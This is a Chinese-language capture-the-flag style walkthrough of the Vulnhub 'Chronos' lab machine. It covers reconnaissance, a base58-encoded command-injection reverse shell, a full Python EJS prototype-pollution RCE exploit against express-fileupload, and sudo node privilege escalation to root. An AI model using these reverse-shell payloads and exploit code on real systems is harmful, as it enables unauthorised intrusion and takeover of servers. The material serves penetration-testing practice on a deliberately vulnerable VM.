Vulnhub之Chronos靶机详细测试过程
Chronos
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:ac:ea:3e 1 60 PCS Systemtechnik GmbH
192.168.56.120 08:00:27:cb:b0:0e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.120
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.120 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 08:02 EST
Nmap scan report for 192.168.56.120
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4f283a438898d86a5e13176eb9d5fea (RSA)
| 256 415a21c458f22be48a2f3173cefd37ad (ECDSA)
|_ 256 9b3428c2b9334b37d501306f87c46b23 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
MAC Address: 08:00:27:CB:B0:0E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.46 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、8000(HTTP)
获得Shell
浏览器访问80端口,页面源代码有JS代码:
<script>
var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}
</script>
可知主机名为chronos.local
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.120 chronos.local
当增加主机记录后,再次访问80端口,页面返回内容有时间等信息。
发现访问http://chronos.local:8000,会紧接有个xhr访问,并且user-agent会被改为chronos
将请求数据:
4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
解码:(用cyberchef)
发现是base58编码格式,解码后得到:
'+Today is %A, %B %d, %Y %H:%M:%S.'
这貌似是linux命令参数(执行的命令是date),因此可能存在命令注入漏洞
因此构造以下命令:
'+Today is %A, %B %d, %Y %H:%M:%S.';bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'
编码后:
7946LGv3zFB5KioYxfxvpWVFFRrEUVNmu7KrnxnieiZYNhfowQQoYbo8AHArf3bJbDsh4fm8NeEJaEi83v1ZoNKYYjg587VYzABDNxBNf2tvC8mBQm1qRpdeDqp
用burpsuite拦截请求,修改请求中的Format,将上述编码后的值替换原有的值,此时得到了反向的shell
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.120] 37498
bash: cannot set terminal process group (784): Inappropriate ioctl for device
bash: no job control in this shell
www-data@chronos:/opt/chronos$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@chronos:/opt/chronos$
在该目录下发现了应用的另一个版本chronos-v2
www-data@chronos:/opt/chronos-v2/backend$ cat package.json
cat package.json
{
"name": "some-website",
"version": "1.0.0",
"description": "",
"main": "server.js",
"scripts": {
"start": "node server.js"
},
"author": "",
"license": "ISC",
"dependencies": {
"ejs": "^3.1.5",
"express": "^4.17.1",
"express-fileupload": "^1.1.7-alpha.3"
}
}
有文件上传命令执行漏洞,利用代码:
https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325
www-data@chronos:/opt/chronos-v2/backend$ cat server.js
cat server.js
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')
const app = express();
app.use(fileupload({ parseNested: true }));
app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");
app.get('/', (req, res) => {
res.render('index')
});
const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
console.log('Server listening on ' + addr + ' port ' + port);
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ vim exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ cat exploit.py
##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
#
# Timothy, 10 November 2020
##############################################################
### imports
import requests
### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.206/9999 0>&1"'
print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})
### execute command
requests.get('http://127.0.0.1:8080') #v2 application
print("Finished!")
将exploit.py上传至目标主机/tmp目录,这个漏洞利用的代码针对是目标主机的v2应用(该应用监听在本地)
www-data@chronos:/tmp$ netstat -tunlp
netstat -tunlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::8000 :::* LISTEN 784/node
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.56.120:68 0.0.0.0:*
www-data@chronos:/tmp$ wget http://192.168.56.206:8000/exploit.py
wget http://192.168.56.206:8000/exploit.py
--2023-01-29 14:06:02-- http://192.168.56.206:8000/exploit.py
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 698 [text/x-python]
Saving to: ‘exploit.py’
0K 100% 205M=0s
2023-01-29 14:06:02 (205 MB/s) - ‘exploit.py’ saved [698/698]
www-data@chronos:/tmp$
在Kali Linux启动nc监听
www-data@chronos:/tmp$ ls
ls
exploit.py
linpeas.sh
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-apache2.service-Dmy430
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-systemd-resolved.service-7S6vMx
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-systemd-timesyncd.service-gtx4fy
tmux-33
www-data@chronos:/tmp$ python3 exploit.py
python3 exploit.py
Starting Attack...
Finished!
www-data@chronos:/tmp$
在Kali Linux成功得到反弹回来的shell(v2应用执行得到的命令)
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nc -nlvp 9999
[sudo] password for kali:
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.120] 53042
bash: cannot set terminal process group (841): Inappropriate ioctl for device
bash: no job control in this shell
imera@chronos:/opt/chronos-v2/backend$ id
id
uid=1000(imera) gid=1000(imera) groups=1000(imera),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
imera@chronos:/opt/chronos-v2/backend$
imera@chronos:/opt/chronos-v2/backend$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User imera may run the following commands on chronos:
(ALL) NOPASSWD: /usr/local/bin/npm *
(ALL) NOPASSWD: /usr/local/bin/node *
imera@chronos:/opt/chronos-v2/backend$ sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
<ild_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------ 8 root root 4.0K Aug 4 2021 .
drwxr-xr-x 23 root root 4.0K Jul 29 2021 ..
-rw------- 1 root root 135 Aug 4 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Aug 4 2021 .cache
drwx------ 3 root root 4.0K Jul 30 2021 .config
drwx------ 3 root root 4.0K Aug 4 2021 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 30 2021 .local
drwxr-xr-x 4 root root 4.0K Aug 3 2021 .npm
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 41 Aug 3 2021 root.txt
drwx------ 2 root root 4.0K Jul 29 2021 .ssh
cat root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
成功提权,拿到root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
